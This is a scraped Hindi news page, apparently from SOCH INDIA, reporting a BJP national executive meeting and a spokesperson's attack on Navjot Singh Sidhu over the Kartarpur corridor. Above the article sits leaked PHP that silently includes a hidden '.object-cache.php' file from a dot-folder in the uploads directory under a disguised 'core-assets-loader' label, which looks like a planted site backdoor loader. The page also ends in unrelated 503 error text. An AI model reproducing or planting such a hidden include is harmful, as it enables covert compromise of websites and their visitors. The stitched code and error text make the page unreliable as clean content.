add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); बीजेपी राष्ट्रीय कार्यकारिणी की बैठक कल से, तय होगी 2019 की दिशा – SOCH INDIA
Menu

राजनीति
बीजेपी राष्ट्रीय कार्यकारिणी की बैठक कल से, तय होगी 2019 की दिशा

nobanner

शनिवार से दिल्ली में बीजेपी राष्ट्रीय कार्यकारिणी की बैठक शुरू होगी. दो दिनों तक चलने वाली इस बैठक के पहले दिन सुबह 10 बजे बीजेपी अध्यक्ष अमित शाह राष्ट्रीय प्रदेश पदाधिकारियों और राज्यों के अध्यक्ष व संगठन महामंत्री से चर्चा करेंगे. इस चर्चा के दौरान पिछली बैठक में लिए गए निर्णयों के बारे में बातचीत होगी और आगे का एजेंडा तय किया जाएगा. मीडिया से बात करते हुए पार्टी प्रवक्ता शाहनवाज हुसैन ने यह जानकारी दी.

उन्‍होंने आगे बताया कि शनिवार शाम तीन बजे से राष्ट्रीय कार्यकारिणी की मुख्‍य बैठक शुरू होगी. इस बैठक में प्रधानमंत्री नरेंद्र मोदी सहित तमाम पार्टी के बड़े नेता मौजूद रहेंगे. इस दौरान बीजेपी अध्यक्ष अमित शाह का भाषण होगा. इस भाषण में आने वाले 3 राज्यों के चुनाव और 2019 के लोकसभा चुनाव की दशा-दिशा तय होगी. बैठक में राजनीतिक और आर्थिक प्रस्ताव पास किए जाएंगे. वहीं दूसरे दिन प्रधानमंत्री नरेंद्र मोदी समापन भाषण देंगे.

पार्टी प्रवक्ता शाहनवाज हुसैन ने बताया कि अटल बिहारी वाजपेयी के निधन के बाद राष्ट्रीय कार्यकारिणी की पहली बैठक है. ऐसे में बैठक में वाजपेयी जी को याद किया जाना स्वाभाविक है. हालांकि अटल जी काफी समय से राष्ट्रीय कार्यकारिणी की बैठक में नहीं आ पा रहे थे, लेकिन इसके बावजूद उनकी उपस्थिति का एहसास रहता था.

नवजोत सिंह सिद्धू पर साधा निशाना

बीजेपी प्रवक्ता शाहनवाज हुसैन ने कांग्रेस नेता नवजोत सिंह सिद्धू पर निशाना साधते हुए कहा है कि वह कांग्रेस के ऐसे नेता हैं जो अपने प्रधानमंत्री का अपमान करते हैं. वहीं पड़ोसी देश पाकिस्तान के प्रधानमंत्री का सम्मान करते हैं. उन्‍होंने कांग्रेस से सफाई मांगी है कि यह नवजोत सिंह सिद्धू का बयान है या कांग्रेस या राहुल गांधी का बयान है. उन्‍होंने आगे कहा कि राहुल गांधी को भी इस पर सफाई देनी चाहिए.

दरअसल, सिद्धू ने दावा किया है कि पाकिस्तान ने सिख गुरु, गुरु नानक के 550वें प्रकाश पर्व पर करतारपुर साहिब कॉरिडोर को खोलने की इच्छा जताई है. इसके लिए सिद्धू ने इमरान खान की तारीफ की. इस बारे में खुशी जताते हुए सिद्धू ने पाकिस्तान के प्रधानमंत्री इमरान खान को धन्यवाद दिया है. उन्होंने कहा, ‘पाकिस्तान करतारपुर साहिब कॉरिडोर गुरु नानक जी के 550वें प्रकाश पर्व पर खोलने के लिए तैयार हो गया है. पंजाब के लोगों के लिए इससे बड़ी खुशी की बात नहीं हो सकती.’

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.